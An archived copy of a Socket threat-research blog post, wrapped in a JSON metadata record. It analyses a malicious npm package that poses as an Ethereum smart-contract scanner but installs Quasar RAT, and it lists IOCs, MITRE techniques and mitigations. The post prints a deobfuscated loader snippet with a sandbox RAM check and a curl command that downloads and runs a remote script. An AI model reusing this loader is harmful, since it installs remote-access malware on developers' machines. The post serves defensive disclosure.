{
	"id": "86d86976-c11c-494a-a2e3-2886ccbb196a",
	"created_at": "2026-04-06T00:18:24.82436Z",
	"updated_at": "2026-04-10T03:20:31.40843Z",
	"deleted_at": null,
	"sha1_hash": "805592bb74de10d6e9e42c12eb82b7702f182f28",
	"title": "Quasar RAT Disguised as an npm Package for Detecting Vulnera...",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 929869,
	"plain_text": "Quasar RAT Disguised as an npm Package for Detecting Vulnera...\r\nArchived: 2026-04-05 17:05:16 UTC\r\nSocket’s threat research team has discovered a malicious npm package, ethereumvulncontracthandler, which is posing as a tool for detecting vulnerabilities in Ethereum smart contracts but instead deploys Quasar RAT, a versatile remote access trojan, onto developers’ machines.\r\nThe malicious package, published on December 18, 2024, by a threat actor using the npm registry alias “solidit-dev-416”, is heavily obfuscated. Upon installation, it retrieves a malicious script from a remote server, executing it silently to deploy the RAT on Windows systems. The package is still live on npm at the time of publishing, but we have petitioned the registry for its removal.\r\nhttps://socket.dev/blog/quasar-rat-disguised-as-an-npm-package\r\nPage 1 of 5\r\nThreat Analysis\r\n“There’s a rat in mi kitchen what am I gonna do?”\r\nFrom “Rat in Mi Kitchen” by UB40, a reggae track by the British band often using metaphors for social and personal issues. Here, the “rat” symbolizes a hidden threat within a trusted environment.\r\nQuasar RAT has circulated in cybercrime and APT campaigns for nearly a decade. Beyond providing remote access, it offers a robust suite of capabilities, including keystroke logging, screenshot capturing, credential harvesting, and file exfiltration. For both individual developers and large organizations, the presence of Quasar RAT in a trusted environment can have catastrophic consequences. Ethereum developers, in particular, face the risk of exposing private keys and credentials linked to significant financial assets. On a larger scale, development systems compromised with Quasar RAT can pave the way for enterprise-wide breaches.\r\nQuasar RAT remote desktop functionality in action\r\nThreat Actor’s Strategy\r\n“You practice lies and deceit”\r\nAnother line from UB40’s “Rat in Mi Kitchen”. Here it refers to dishonesty, echoing the threat actor’s deceptive practice of disguising malware.\r\nThe threat actor used a variety of techniques to ensure their malware remained hidden and resilient. solidit-dev-416 wrapped their code in multiple layers of obfuscation, employing Base64 and XOR encoding, function wrapping, and minification to complicate analysis and evade detection. Furthermore, the malicious code conducted system resource checks, such as verifying available memory, to avoid execution in automated analysis sandboxes. The delivery mechanism was equally disguised: the initial npm package acted as a loader, retrieving and executing Quasar RAT from a remote server.\r\nThe threat actor’s deceptive description of the malicious package claiming that it helps Ethereum developers detect vulnerabilities with AI\r\nThe following malicious code snippets, deobfuscated, defanged, and annotated with comments, offer insight into the threat actor’s methods.\r\n// The code is heavily obfuscated with base64 and XOR encoding to hinder static analysis:\r\nconst _0x2ea2 = ['W5tdN8k6vCol', 'prototype', 'W7D3g8kgWPq=', ...]; // Large obfuscated array\r\n(function (_0x57fc1d, _0xcf027c) {\r\n  // Nested anonymous functions and complex loops to evade detection\r\n})(_0x2ea2, 0x178);\r\n// Checks system RAM to avoid low-resource sandboxes or VMs\r\nif (checkRAM()) {\r\n  await new Promise(_0x244073 =\u003e setTimeout(_0x244073, 0x1d4c0));\r\n  // Downloads and executes kk.cmd from a remote server, initiating the Quasar RAT infection\r\n  exec(\"curl -k -L -Ss hxxps://jujuju[.]lat/files/kk.cmd -o \\\"%TEMP%\\\\kk.cmd\\\" \u0026\u0026 \\\"%TEMP%\\\\kk.cmd\\\"\");\r\n}\r\nOnce the malicious npm package is installed, it initiates the second stage of the attack by downloading and executing a malicious script from hxxps://jujuju[.]lat/files/kk.cmd. This script, upon execution, runs hidden PowerShell commands and triggers the Quasar RAT infection (SHA256: 9c3d53c7723bfdd037df85de4c26efcd5e6f4ad58cc24f7a38a774bf22de3876) on the victim’s system. As a result, Quasar RAT becomes embedded within the compromised environment. To ensure persistence and continued operation after system reboots, it modifies the Windows registry key HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run and renames itself to the innocuous-sounding client.exe to avoid attracting attention.\r\nWith the RAT operational, the focus shifts from initial infection to maintaining persistence and exfiltrating data through a C2 server at captchacdn[.]com:7000 (IP address: 154.216.17[.]47). The threat actor also uses this C2 server to catalog infected machines and manage multiple compromised hosts simultaneously if this campaign is part of a botnet infection. At this stage, the victim’s machine is fully compromised and is under complete surveillance and control by the threat actor, ready for regular check-ins and to receive updated instructions.\r\nRecommendations and Mitigations\r\n“I’m gonna fix that rat, that’s what I’m gonna do”\r\nThe final lyric from UB40’s “Rat in Mi Kitchen”, which we use as a call for taking decisive action to address and remediate this and other supply chain threats.\r\nThe discovery of Quasar RAT masked as a tool for detecting Ethereum smart contract vulnerabilities signals how threat actors choose their targets and implement their tactics, techniques, and procedures (TTPs). By embedding malicious code into what appears to be a helpful and specialized package, a threat actor can compromise entire networks of developers and enterprises.\r\nAddressing such stealthy threats demands a vigilant and layered approach to security. Development teams should scrutinize all third-party code they bring into their projects, especially if it claims advanced functionalities or comes from relatively unknown authors. Monitoring network traffic for unusual outbound connections and investigating unexpected file modifications can help detect compromised environments early.\r\nEmploying trusted tools to continuously assess dependencies is essential. Integrating Socket’s free GitHub app, CLI tool, or browser extension can provide real-time insights into the integrity of your supply chain, alerting you to malicious or suspicious components before they become entrenched. By combining careful vetting, continuous monitoring, and the strategic use of dedicated security tools, developers and organizations can stay one step ahead and ensure that the “rats” stay out of their kitchens.\r\nIndicators of Compromise (IOCs):\r\nMalicious npm Package: ethereumvulncontracthandler\r\nQuasar RAT SHA256: 9c3d53c7723bfdd037df85de4c26efcd5e6f4ad58cc24f7a38a774bf22de3876\r\nMalicious Download URL: hxxps://jujuju[.]lat/files/kk.cmd (defanged)\r\nC2 Server: captchacdn[.]com:7000\r\nC2 IP Address: 154.216.17[.]47\r\nMITRE ATT\u0026CK Techniques:\r\nT1195.002 — Supply Chain Compromise: Compromise Software Supply Chain\r\nT1059.007 — Command and Scripting Interpreter: JavaScript\r\nT1036.005 — Masquerading: Match Legitimate Name or Location\r\nT1027 — Obfuscated Files or Information\r\nT1059.001 — Command and Scripting Interpreter: PowerShell\r\nT1546.016 — Event Triggered Execution: Installer Packages\r\nT1105 — Ingress Tool Transfer\r\nT1547.001 — Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder\r\nT1056.001 — Input Capture: Keylogging\r\nT1113 — Screen Capture\r\nT1005 — Data from Local System\r\nT1071.001 — Application Layer Protocol: Web Protocols\r\nT1041 — Exfiltration Over C2 Channel\r\nSource: https://socket.dev/blog/quasar-rat-disguised-as-an-npm-package",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://socket.dev/blog/quasar-rat-disguised-as-an-npm-package"
	],
	"report_names": [
		"quasar-rat-disguised-as-an-npm-package"
	],
	"threat_actors": [],
	"ts_created_at": 1775434704,
	"ts_updated_at": 1775791231,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/805592bb74de10d6e9e42c12eb82b7702f182f28.pdf",
		"text": "https://archive.orkl.eu/805592bb74de10d6e9e42c12eb82b7702f182f28.txt",
		"img": "https://archive.orkl.eu/805592bb74de10d6e9e42c12eb82b7702f182f28.jpg"
	}
}